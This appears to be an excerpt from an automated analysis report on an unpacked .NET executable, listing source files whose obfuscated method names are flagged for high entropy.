Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, bBXk7o2bxZxi5i8NE3U.cs	High entropy of concatenated method names: 'ffi2SIsTAF', 'xbC2ytDU0v', 'QX123Jk4qj', 'u832a8bFIF', 'Dispose', 'Bdj1sPFM0xPqnP9giqwe', 'X9RthoFMUgyJslaiWaid', 'GBKO0lFMhffE40QpxpAb', 'NIUUEkFMvt2xY1Q5x34l', 'cbBHVrFMQQlWUKIeMkCr'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, UtHdrj2YosutCLKVjcS.cs	High entropy of concatenated method names: 'oNn2h0mtXJ', 's9C25IqHIl', 'SJZ2XXGRTE', 'OfT2ooww6m', 'O7n2j6Vq5W', 'xEQ2Ex0Oad', 'dB92K03sLH', 'Sic2k5L0If', 'Dispose', 'jEgNo3FMBsk81fRVog8N'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, nW5ZnUTZwIJ6JZfHIcM.cs	High entropy of concatenated method names: 'UaJTJThv7i', 'm68TwOSTB6', 'hRuTz1umBY', 'E4EcCyTJ41', 'Na3cFcFDUN', 'L1ycRSNOGI', 'wACcmslEhy', 'veCcWYrmPI', 'yi5cfsQLqA', 'WZicqRBejW'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, Lb8dIiZQrm4v1PoKFpp.cs	High entropy of concatenated method names: 'odwpDQFJmn9yZUtdDcnR', 'GQYFXFFJWYGZFErHRoij', 'sjfMIFtEuU', 'cCanUsFJtRm9gvDbUwbs', 'QttDgyFJ1Qiy0WMqEStN', 'RYaBqFFJl4cM5C6Pixau', 'XQIHvhFJxhLDvmHxhpee', 'owIdeCFJ482ZHcK7OC0T', 's1w0fxFJYku8eKtjt932', 'eQM7e5FJ0ehQ4Zjc9mj4'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, g3VvtZgmURJWyMLWjAV.cs	High entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'SJwgfaEjZU', 'Write', 'qEngqFHjOJ', 'y1mgB34elA', 'Flush', 'vl7'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, RnCU5MFpcDgWsccjmZv.cs	High entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'yDIFBzX6etv', 'tppFWFnnMPA', 'n82YKKFgprXX8WI3mAiW', 'c29cqFFg589U3E4tEsE3'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, DMFUBvJprpZ6MX95NQt.cs	High entropy of concatenated method names: 'Cu2JV2f5bA', 'LqOJNVUSJ7', 'V0eJbWuH5m', 'kbxJe0IASH', 'yxvJSCiNRk', 'HPZJySlHWX', 'ENTJ3b0G4P', 'MJBJaPcUPc', 'vRLJLvSJMQ', 'ngrJdy2w0C'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, XsNwZojAVEhLp21jheL.cs	High entropy of concatenated method names: 'HmCjI18pHY', 'fKfj9pqCd8', 'zSBj2ALEic', 'B79jZBkKe8', 'UvDjMnr3ua', 'PIgSe2FHDg2lfrIxihG7', 'sLDvvDFHT6FIi80ehxeF', 'WI1qCBFHcvPMxHCTvXjl', 'PJBMZZFHOxrigkjIP7UH', 'VZ0jlXFHHHbi7J5vEkk8'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, scC9m8kb2G5L9TRMhiU.cs	High entropy of concatenated method names: 'method_0', 'Q5LkS2gIBe', 'LWfky6gr0j', 'oNPk3ic7YH', 'GOZkaFojqc', 'ocrkLaETD3', 'Bg2kdO8aQc', 'ko1F7LF7q4uU2ICIx5RI', 'X8jkh5F7BtAlibv66G0c', 'gMEWVjF7tHT97L44JsUA'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, D1iQNZ6xCqtDlO26Eue.cs	High entropy of concatenated method names: 'Rrr', 'y1x', 'JroFtX3jgfF', 'prCFtogCS3O', 'wBQkm1FDHG88TM0llMCQ', 'IEuv6SFDnIGLxtfKMbaR', 'H1w6cOFD7MV9oqZnYdYY', 'e7OZGQFDsewxWWkuVMkN', 'eHbIfgFD8tAKKkXhSujf', 'eU8s2TFDG1hJwY65jM3I'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, bkahGwRPJAf3nl0OqmU.cs	High entropy of concatenated method names: 'HAYmBGFMYH', 'XO5N5DFr2Fqt4s0r0ycv', 'Ol6lvsFrZG1sZiG014QH', 'FIgZSoFrMioK1grwhG4n', 'aI3NK0FrJnLnpZRrLgfN', 'G1nUnmFrIKZ1D0lExB6p', 'r3oVtrFr9ambCeqH2A5e', 'BOPCTbFrwPIjq0qgX7ux', 'wOsmC209Tv', 'KBpmRBsoBU'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, IoVxrLKIFt7fXiO2BQQ.cs	High entropy of concatenated method names: 'pmrK2il4gs', 'gSdKZSDsFF', 'QCKKMqYve5', 'luNFpGFnuVtV3fMpxIwH', 'i8U2UgFnP3Ue9Zwgj2EN', 'otUKkNFnAvIMyrKiTy8u', 'IqYbOPFnIiV1nHGZtuIE', 'EXQ1aVFn906W0jndHo3g', 'jLhL0uFn2wcB02PiE8hN'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, FspQ6oESkE0N7J4rQfO.cs	High entropy of concatenated method names: 'fLyE3KjXoR', 'xJ2qfdFHzVBO3jWYApYU', 'pDYm0dFnCo6kBTtdSk58', 'i262DsFnFnrY46GSe6i7', 'vIWghQFnRgkcDbMQ86Ni'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, bk5JwiIkDZSiBcrm3L1.cs	High entropy of concatenated method names: 'TCJFtKDL6TX', 'whcFq6ugZ2a', 'yQ8', 'K9m', 'GpJCvaF2VZ7hYOsm3c3F', 'R5IpdCF2gd1kf7gkCo1Q', 'k92AaiF2rP5PihDBDRxt', 'r8VX40F2NWMFrJvAnEkt'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, f4FS5rfyCG0BE2ExRgC.cs	High entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'cmJFWxfZlfA', 'l29favHWCB', 'imethod_0', 'LyvNDcFbd1sWI3BZr3S7', 'PLTjCOFbTCxaDN2wayGf', 'v2DWR1FbcEmN68S7rkSd', 'P91k7gFbDgnEjwbFuvZY'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, IaFqGvr7qoMTj0vWCqI.cs	High entropy of concatenated method names: 'WEqr81yMT2', 'MberGBn6FH', 'EBhrP5wk1s', 'Wb9TnuFs6RSRD0gmCNQs', 'ogb7X9FsXdiRreInpLBb', 'ML6jjqFsobJo2f4AbAYV', 'bf1xd7FsjMMRvHFKuxcZ', 'yUO1gcFsEIc2F7yFZS4e', 'PyIi9bFsKcWYv1nI1GO1', 'glmJ33Fsk0sIH8tDWghC'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, f4FUZyVtnmNWPJZGv5K.cs	High entropy of concatenated method names: 'UcXVly93bv', 'H9lVxYGhTh', 'sY6V4LBiCD', 'SenugbFsGbC9KyyeaouX', 'YCJJVIFsPnsF0jOHMq9P', 'GxOZRsFsAr2dLk2YsHRP', 'EmqKrAFsu4mRgaIpNtA5', 'nmIq0lFsIAWK39FscZti', 'jFNs1dFs9D4okfqOAevN'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, oWMIeSVbARowYyO8CCL.cs	High entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, nimHOhqDR0XehhUMn1D.cs	High entropy of concatenated method names: 'boMq2PFf1o', 'seaqZ90N2d', 'uL2qMecyHO', 'lJgIjuFewM9QScMDVjcM', 'vL9tX6FezCKspq19XrX5', 'OOHi4rFeMqpxMT6iyupS', 'yursa8FeJU5QxyrJSe3N', 'SYVqHfxkbm', 'wSsqnq2Os5', 'IgRq7b7OWI'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, d4DDcFB1YaeS5ymMq2O.cs	High entropy of concatenated method names: 'ni7BxbmRSE', 'FFmB45wUFG', 'J3m6roFSYPLTdis0kOaM', 'EBBv1vFSxfTFMsDElaIf', 'R1dY4ZFS4DrWxUQ38v7a', 's7MPgCFS01jYQMaaAlAe', 'pMQsGOFSUDBibYsZrEWj', 'HL5J86FShawcDXC0uCMh', 'eZNMCXFSvYXF5e6yItGV', 'dWCE7CFSQluYbZ0rSt1r'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, B7swkY5d24qgw4JNMTX.cs	High entropy of concatenated method names: 'iQd57yhWUd', 'PiW5sMLOcS', 'NZy584U091', 'X4auF2FctCnlo7GQwIT9', 'sCq3UMFc1AWEPgvuKqH7', 'c0up9uFcqjm5SMNYMK3H', 'ojNgaJFcBfnU0tvZdsRt', 'OGG5copb4i', 'Yju5DJgMC4', 'RfY5Oyq7sU'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, qsb7IV6F2wSBjePpK4D.cs	High entropy of concatenated method names: 'rC9', 'method_0', 'gD1Ft5oX5Jg', 'MmxFtic2k7s', 'qwDP7SFDVE78WIihpT4v', 'N46MTHFDNtLnpIFmSUXs', 'tjfpIMFDbRfGw9ivExQA', 'J4kruxFDeX63OHadpheu', 'xIm8LXFDSJt86TayxHfM', 'bReQaLFDyGev0q6i6qOC'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, FBDnIjkxxqDhtGVx6Kr.cs	High entropy of concatenated method names: 'nLNkYVBg1T', 'JuJk0AaSsV', 'rMlkUvxIhZ', 'eVskh86UI4', 'hEBkvkyEEo', 'O5QWyWFnw6BZIHYR1HAr', 'DEyfcuFnMaKrV4plHFGc', 'kq6xYBFnJM23ETZs5sje', 'EFJ3E8Fnz8igK6aHnWQW', 'X4263QF7COBi7Zlq8R2a'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, EdHrs5Riu05jhthKn9l.cs	High entropy of concatenated method names: 'tHkRXqKx3Z', 'gXyRoq6276', 'yNTJJVFrX7fRvnnl88ru', 'V9AI9yFrivlevqDg23pP', 'PAskerFr6dJw3iKElp5I', 'U8xKS3FrobHkrwwfg7iF', 'R3fVEdFrjlUNHFtxiUsI', 'zqn3BsFrEQ1ovdiGNKCI', 'iOO8TxFrKhvbiqWswitP', 'VeUwH0FrkdnM3Z29N9vA'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, h0h4vuruufbah7wPSfo.cs	High entropy of concatenated method names: 'K0Hr9Sk9AD', 'q3rr2abS8J', 'wJGrZ3GVkQ', 'prDrM3r0nb', 'wdvrJDVBiC', 'KFuts5FsVBiSk3QU7r2L', 'F5mAYAFsNJB3PahIeOHf', 'pJv2cIFsbN1MPwkbdlxh', 'blH2U7FseQVNMRErdy59', 'yfdKaoFsST8jq2J8s868'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, oQXbyMf1LcX9TnWRQFc.cs	High entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'aTiFtfNqhuQ', 'tppFWFnnMPA', 'udv1OPFbUxWpPT9p81nI', 'OLduAyFbhkt949WfEMwt', 'PD0gdGFbvmj3HwfQVDE8', 'iOvSaWFbQO62XpLDWCol'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, hJrPErXYRO7mn0ciTTb.cs	High entropy of concatenated method names: 'q5OjFL0h3k', 'FGZD2YFHh9a4WaDTOjNs', 'Q929sFFH0uEYQYdM8hCr', 'YEQs6jFHUeauAusAP7IN', 'yow53ZFHv90aqs9WigdM', 'wVoXU5XNl1', 'VXGXhFvij6', 'L2YXvJT7d2', 'PbKXQwNcbS', 'VNMXpQVnXI'
Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, JvN7QYQTR4ll9U8FD3.cs	High entropy of concatenated method names: 'MFfyxWVf5', 'oyyljwFkVg6DhPIw7fpj', 'fwC10vFkNRRJt2dKPUtT', 'INnm5YFkbPsaOla3rHXu', 'Eoh5E4F4i', 'poFiHqPmo', 'JUm6CYrrc', 'iDRXS1p1P', 'k3doM7ZY0', 'XA0jEvTmW'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, i8MHTy5IUZXchyIkHoM.cs	High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'yPYFtYK47xE', 'mmCFW7bg6VW', 'oTfQ1eFcvAjPWeYZOkxv', 'LRHFkZFcQ5syrJf5qyo5', 'bPCwDBFcp1EP96pywLrn', 'rpB36oFc5bfDIsMruvNd', 'HFrGNOFci7wynK8etRNP'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, D9sVL9VYOoKcLa64l1l.cs	High entropy of concatenated method names: 'LICVUshTpO', 'fWIYjmFsJ31Gp4AJAbh6', 'N75ktXFsZLHC8y6BXL1b', 'anubxHFsMI8f0nUkvD06', 'E9ivY6Fswpft8Sva1kSR', 'zbIl0vFszJsonEJcNGKo', 'EfdXhGF8C7WseKf1eNR7'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, cLLiHJUx6fDetmWNaKE.cs	High entropy of concatenated method names: 'Dispose', 'DUIUYrl4aV', 'u2JU0QQcgH', 'Jb4UUc7w2k', 'q57YvPFLIWuoXeA3q49A', 'oSbjDfFL9yt28LAdiPqy', 'T5V7wvFL2V4XK609fVM4', 'a6qKXXFLZohdQg4rEdIW', 'e3C7bZFLMxtHfJA4fb1A', 'nIPVDBFLJ8yKXdsqYtUA'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, AuC9vOe6sFqHBNt43tA.cs	High entropy of concatenated method names: 'k68S0E0yEc', 'VBAYFBFPai9sCiPK3hLp', 'nKdSfXFPLVRIIuy6FOBF', 'Rju8COFPdCkYlWIV0J6Q', 'kt5', 'PJFeoIRfex', 'ReadByte', 'get_CanRead', 'get_CanSeek', 'get_CanWrite'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, uwMIsmF0IVHZpv8PrHf.cs	High entropy of concatenated method names: 'BuwFhmipqy', 'E7LFv2h1aZ', 'RMJFQIktac', 'vgYpB4Fg0mPh6DRAOOrv', 'JKRlIdFg4PtVKEobhZ97', 'GjBbymFgY16KZQjv4WR2', 'Ahlm8XFgUoMLTYQvtyBp', 'GKFtNTFghoHxSeYLTJkc', 'm6OBx5Fgvv3hjG20nYpi'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, FkykDdtlt3RckAZ1xhG.cs	High entropy of concatenated method names: 'aZht4uG64F', 'c7GtYKXhl3', 'SXAt0t3dup', 'juiKdbFypLUdrHKD8l1y', 'B9xVJHFy5l5qx1J0D9Fs', 'G4iZGcFyvV3PxuaBctHC', 'FnEPZAFyQvLvTmRj55m6', 'RHZsKuFyixoP09fpp2df', 'jBNeAHFy6Ew3VIkEQ3Qc', 'kj6BRHFyXGLJFHkABd8f'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, Rp0ihpmPKMlOOyDDGim.cs	High entropy of concatenated method names: 'thtWmJj82g', 'tIEWWrqTqd', 'NJPWfkTFxw', 'OSg9qkFNRSA2LfM3Zfto', 'H0H5JQFNmengNBySGuXI', 'T1XgHBFNC7uym3S9iIeu', 'g4HolBFNF2ta5YYg17Kx', 'BRBWxV84ox', 'ifghdUFNfUJOMrXlb1qc', 'JqybQnFNqSp1NBFdFrah'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, aQGccvNwdjIgwoYMEiu.cs	High entropy of concatenated method names: 'a87bCruZsj', 'kVxbFDUd5M', 'Yd7', 'lvTbRZrpvk', 'EiSbmDNwnK', 'afqbWK1N8k', 'nwcbfUkajJ', 'MBlgCpFG7tP8qVJdLirA', 'dKBmZRFGHBk4pJPBdNAW', 'sqLrUIFGnksAT0VuvROx'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, oG2KJpqE5Ffil8OrnND.cs	High entropy of concatenated method names: 'XXwqbFc7NN', 'JfrxGKFeeIKmUlo4JxXe', 'k5p9LpFeNwtX2OwUS5vh', 'cRcOtdFebOsP7wG4VM7q', 'hADCU7FeShJ8aGfndggk', 'lOjl6rFeySMFb1gMntXG', 'E94', 'P9X', 'vmethod_0', 'CdRFWicXVaD'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, DO2t60RfR2XgTQMBRrC.cs	High entropy of concatenated method names: 'bwgRBgY9j4', 'O1pRtYsRJ9', 'Eu4R1lxYsy', 'exsRlnebMX', 'SJfax0FrlsIQoZPhVfS1', 'DSR00OFrtUMsDZBxhJUt', 'TJ7epXFr1A7ftCxWhnGY', 'bxPLdbFrxfyqgheoqtCT', 'BfRlkEFr4mRNxl9OwcVe', 'Tm61PBFrY5EpiYB70r92'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, nfG7DffHYnOReArO7DN.cs	High entropy of concatenated method names: 'wpOfGgnGSb', 'bvm0X1FeCCHveSvHDRC6', 'r3og7tFbwP8LGj8REaHv', 'SOmmArFbzUV43L6Nm3hM', 'hLfwhTFeF2JsGlHnqS4g', 'U1J', 'P9X', 'j2yFWhF0WtQ', 'NPPFWvLWdB0', 'DKMFtBS7a9n'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, iaYXFhjlgvTwxL6B5PV.cs	High entropy of concatenated method names: 'Xs6jbGlhAN', 'isOj4eDFOS', 'y8PjYmvYyT', 'MuHj0oDKGn', 'klsjUMhxSE', 'hDVjh7OLLt', 'n14jvrWJjR', 'LFOjQEiLb4', 'zqEjpYsyDD', 'EBuj5EpdSt'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, I5ND6dyPJv9U5fSS4bc.cs	High entropy of concatenated method names: 'eSy2uOFAZhNK6wTWIqy9', 'aMMKXHFAMd4ZlJCYn048', 'YLEAfeFAJcja92jhR2MQ', 'MaSyurq4os', 'Mh9', 'method_0', 'FWJyIogGIu', 'y6gy9MhSID', 'mDyy2JoKqt', 'hYFyZTIeNW'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, zdnBb2BbysFyXAB2SfU.cs	High entropy of concatenated method names: 't9yBSZoXU6', 'rSgByZCN0Z', 'Ux3IToFSHsWDGBFM93Ax', 'Bj9kLjFSneB532LNbdNq', 'tXcBUjFS79QSMCI8LV6Q', 'VehSEAFSsTmaqDUJm01b', 'yxymfkFS8xhgQsTixfoA', 'p6mSWqFSGEks0PiiWPdL', 'oNEdDrFSPHFdmbllHUp4'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, NoU9uRNnDjGBMU3eWRb.cs	High entropy of concatenated method names: 'YF3NsvHyuS', 'SDmN8fqQoB', 'rUYNGod4Bl', 'EXGNP4SmOw', 'V2eNAP7aeX', 'rnK8EmFGefapmwwIvhBI', 'ioCLcFFGSWuSGLL4AZH1', 'OanH2fFGyrdEDl8QH3gt', 'ixTF91FGN7QlC6DVQLMv', 'j0EwJIFGb0uthdtcKMy5'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, LlmiaaFw5vkf1uI2WFd.cs	High entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'fTGFtF27Vrb', 'tppFWFnnMPA', 'xPLiZlFg2h1WkJ64Rej9', 'UfA99YFgZ5m0kLiQMjus', 'IPOb56FgMmYBoDeRgylZ', 'INX3SXFgJaH6ZMS6JlGE'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, vyXf3ut7A1eNiF2hDQR.cs	High entropy of concatenated method names: 'JSRt2c8HRV', 'hd6HgsF3UHfHcmbS0iW0', 'QFGrAoF3YAD9LG68O8pM', 'gjtglWF30TjSbWMIVJvV', 'JSJ8GTF3haachJ41OVOp', 'P9X', 'vmethod_0', 'bcrFWgyvftZ', 'imethod_0', 'Q2bIb4F31Vo5EOCL7cMq'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, l4YxQJSPv60jeyKi3Cc.cs	High entropy of concatenated method names: 'v8pSuXNb1c', 'k6r', 'ueK', 'QH3', 'wx5SI962ou', 'Flush', 'GvQS9tgHvE', 'sOoS2YP6U0', 'Write', 'XPmSZv0WDh'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, UM9xxuFIqa7FAijmiUO.cs	High entropy of concatenated method names: 'P9X', 'TP4F2kvWwA', 'coQFtCPDvSZ', 'imethod_0', 'd81FZOYtGo', 'i3u7G9FgGTWXLX0QpIaA', 'CLNZrbFgsoPRUNvaMpU0', 'zHiNpoFg8TvBKSYo4TXx', 'ux5vOaFgP67oiqr3ffRt', 'pDVnHHFgAo78DPdlHcgp'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, XliTLta3PNtHkmSBql7.cs	High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'L3oPugFuEJNcV1qf4wRp', 'SZD0AQFuoSgkennX53R7', 'uKuy5XFujPS0pSUY8wiU'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, leZj9MIbd0D3vevLXls.cs	High entropy of concatenated method names: 'method_0', 'h59', 'R73', 'DIGISlr55r', 'CDlZM5F2elHaHK53jcwE', 'oQVkxwF2SnOvVO3Blhq8', 'gE7EfJF2y7FIj8Neovca', 'RbFaP4F23HPJTBoVDQB8', 'cq1qbxF2aoIEoI6EMHSb', 'vGkRiBF2LbAyAOc4JrKq'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, YST0BhBFTfLMUgDUTPd.cs	High entropy of concatenated method names: 'UtxBm6kV9y', 'NqjBWitJFw', 'LHYBfGUvbW', 'ccZNE8FSmvuurd1pj3va', 'bMA8fXFSFtDM8BrJOygt', 'bx4cNrFSRqgYBSBD8WUR', 'gPxpIeFSWEFWvvMnWTQx', 'ge8b9qFSfwskWj51KGSY', 'oh9WQ0FSqLTnkGD4hHqt', 'jBBchvFSBdfIN5RXubEC'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, HhrWNMWK2fpm2NgJOhX.cs	High entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'Uy8FtmelKSI', 'tppFWFnnMPA', 'Uq5WwIFNouY9iZFeoxsd', 'Lo5kpFFNj5qHmoPJ2f6y', 'rEURTiFNEIbEmD8LIN3x'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, TZsLZfd16BC61SSk9gw.cs	High entropy of concatenated method names: 'k9rdE60HPB', 's8AH9dFIBTnppD45mWM3', 'Df6LvoFIt8h774RMDWEw', 'xNJ4M3FI1LlHIgNU1PKi', 'kQiOC4FIlSCuXAcPyBa0', 'IPy', 'method_0', 'method_1', 'method_2', 'vmethod_0'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, U8hbBi10Ip00baZdKYF.cs	High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'AFbZm2F3cGT2XFhv7nVd', 'wr4NwAF3Dd3rc21a4s00', 'OlEog5F3OVp03Pg277Fq', 'fSJ1hZQaMs'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, dFEVcOTb1D5Ls50Kop2.cs	High entropy of concatenated method names: 'LvTTSTlicZ', 'EUmTy4cWOt', 'uEeT3kJrQX', 'yrBTahkHwx', 'vymTLNYsKD', 'FO1TdmERPe', 'KV1TTtN221', 'zBrTcaat2x', 'WtSTDNsfY1', 'mMUTOB3oCf'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, y0ZRH8S3hG81V9sFWdq.cs	High entropy of concatenated method names: 'Close', 'qL6', 'EhXSLahHXR', 'fbWSdU3Iap', 'W9oSTrG4gK', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, ogCmltc3yXmTbx1gfX7.cs	High entropy of concatenated method names: 'sX1chiF9DDZV0UM7Q0Il', 'U6roc0F9Om2bjJtwlwe4', 'KDB4WuF9TI8aoxFNcGhV', 'GbarTwF9cZwDDORg2Yp9', 'U987fsF9L65XRDcIPwZT', 'abdZMDF93S3OkSHf9cjt', 'm9BgYSF9ak0So3vqCa4d'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, vhW8De5ri7L0uBXZgxu.cs	High entropy of concatenated method names: 'bOV5acULf9', 'JgPMl8FTz2NLlw5Fl7pO', 'dcmY7SFTJoOk4ZxRrUAs', 'qmUQtDFTwgkUx08sNswv', 'OmHPaNFcCNQnN7mhJGGP', 'g255NeEk1T', 'l7X5bN2ald', 'oNr5eOJbnf', 'SXH7jAFT2XXsxgYA4uBh', 'mHwQaEFTZDqu3xKQYust'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, ipZ7PHdnIe369T70yff.cs	High entropy of concatenated method names: 'sJAFtEfXRv9', 'wp1ds9Vwwd', 'dtOd8XiUKI', 'mD1dGwuuta', 'ucBfvVFIiShj5CuKuBJy', 'wx8S4fFI6FIsYXYHjfaq', 'gQfm4UFIXhyjtulD3xbE', 'UX5qb6FIo3otMYqSIW4N', 'W2KEiHFIj3rgCmO27uK8', 'qZGhrCFIEiVakCBPaRjX'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, o7QBsXRbkvfTHVqk6bs.cs	High entropy of concatenated method names: 'P3kRDVx9Ms', 'F8jROQrAH0', 'kqxETYFrybJKQuNqnaWv', 'SjU5qWFreceoW9UVyvQi', 'pIyRgcFrSLQxDf6DTAuU', 'ntmhkhFr3ZWQ1mcQUTq2', 'l8yRscNqUX', 'JENSoxFrTJ3UIw8u8TFn', 'KXuITMFrcKVFq1qWrObj', 'cG7iTCFrLiEikDDCxNsT'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, T5JQRuWTsFGF6mVo462.cs	High entropy of concatenated method names: 'lQiWJCClZl', 'M39KGmFbmd3V9JedngKM', 'RiK948FbFqSbpDkEGwXH', 'uM1rrSFbRJK3xSRgxbD4', 'Am2USnFbWcvmaGo10Lm6', 'iDq8UNFbtSsA5HxRNUI4', 'oHa1ScFbqm4iY8gI4FiQ', 'PbAxd5FbBslQQuZ5B65X', 'mFuADAFb17brMW9GxmLm', 'B8Gfq3KVel'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, hUeysmJTMMCuD9vbtDG.cs	High entropy of concatenated method names: 'c4KFqe1xuwq', 'ng5FqSPwknt', 'yW4FqyKI01L', 'Ce1Fq3kZUlS', 'h3dFqaqYLOY', 'uB8FqLgeGw7', 'nlVFqddaGBK', 'zsywfKVUri', 'sDRFqTJ7bR0', 'modFqcEP3UX'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, aYryTSUoVJqCteKVAgg.cs	High entropy of concatenated method names: 'Dxh5YhWTlQ', 'oDf50iMM52', 'LAA7vsFTcWkeTegZ3jO0', 'CVZv2xFTdAPuj9rL5LGU', 'YbYhwGFTTtphh3G4K7wc', 'PuO5yVFTDwZDhhuyPXUh', 'ILKPSCFTOA9DiNjljsdU', 'aiB556ecDt', 'NKqnU3FTnHWZDoCv8Al6', 'qWyk0LFT70w08y85cEsJ'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, h2qYPjB5wpqUvZLVs9w.cs	High entropy of concatenated method names: 'm5aBrWXGbv', 'tsOHAoFSdGyGUrbufcZ9', 'EyLK1HFSTDgDy9qt1Ufs', 'VjPFeEFSavnDCBjP2viK', 'XTJBdwFSLRoKuWJqmHFO', 'd5oHXKFScYByyrNpnEf5', 'l5aTrWFSDHxfeqfvQQd6', 'EC7B6SHRNb', 'u8nBXpI018', 'IQpBo7hihD'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, Glrptntv08UUWSF53LF.cs	High entropy of concatenated method names: 'k7ati9w0vV', 'c8H2ATFyytbfHRgMHK1j', 'GKHKorFyetAy6eftd3Ti', 'TNSY4GFySyAmYMQo7GCn', 'HBJyJ3Fy3NPLAUap81iQ', 'LU1tpbkXhC', 'WZuUjkFygRskAQ2ERH6E', 'Rkvd3DFyrBODuWpWOJ9y', 'OrRnLDFyV2obSrk2dQID', 'dl58pFFyKuhYlXSEtpZU'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, o1oYKWid2KpX1FvrONH.cs	High entropy of concatenated method names: 'N2N', 'HZZFtUnfp3N', 'mTIicQJpJt', 'ThEFthyai0i', 'J6R3SbFDfAtT83eJRN6i', 'vj8fQ2FDqb4fje6Exa72', 'N8CVIjFDmtD0A7xdnccG', 'XvoFYUFDWQBPQxUywDvx', 'L83q5ZFDBQgoPER7gAHi', 'XCjJTfFDt9vwPA2cO0s1'
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, TRm9WYILYoLflnXClmm.cs	High entropy of concatenated method names: 'LsNFtkPbFsZ', 'Nk8FqKRgeP3', 'ytoTnqFZBF59dEh8pKoW', 'F4cSclFZfTjBBRSyhPcW', 'VYwY8AFZqbZbHd0Sl7wk', 'wG04XIFZxGFOEpojA68C', 'hKthmoFZ1MPxrL1xNMes', 'tEk6HvFZldlBN2xpgtjj', 'qtjgUOFZ4iu6Bb9TrGRU', 'imethod_0'
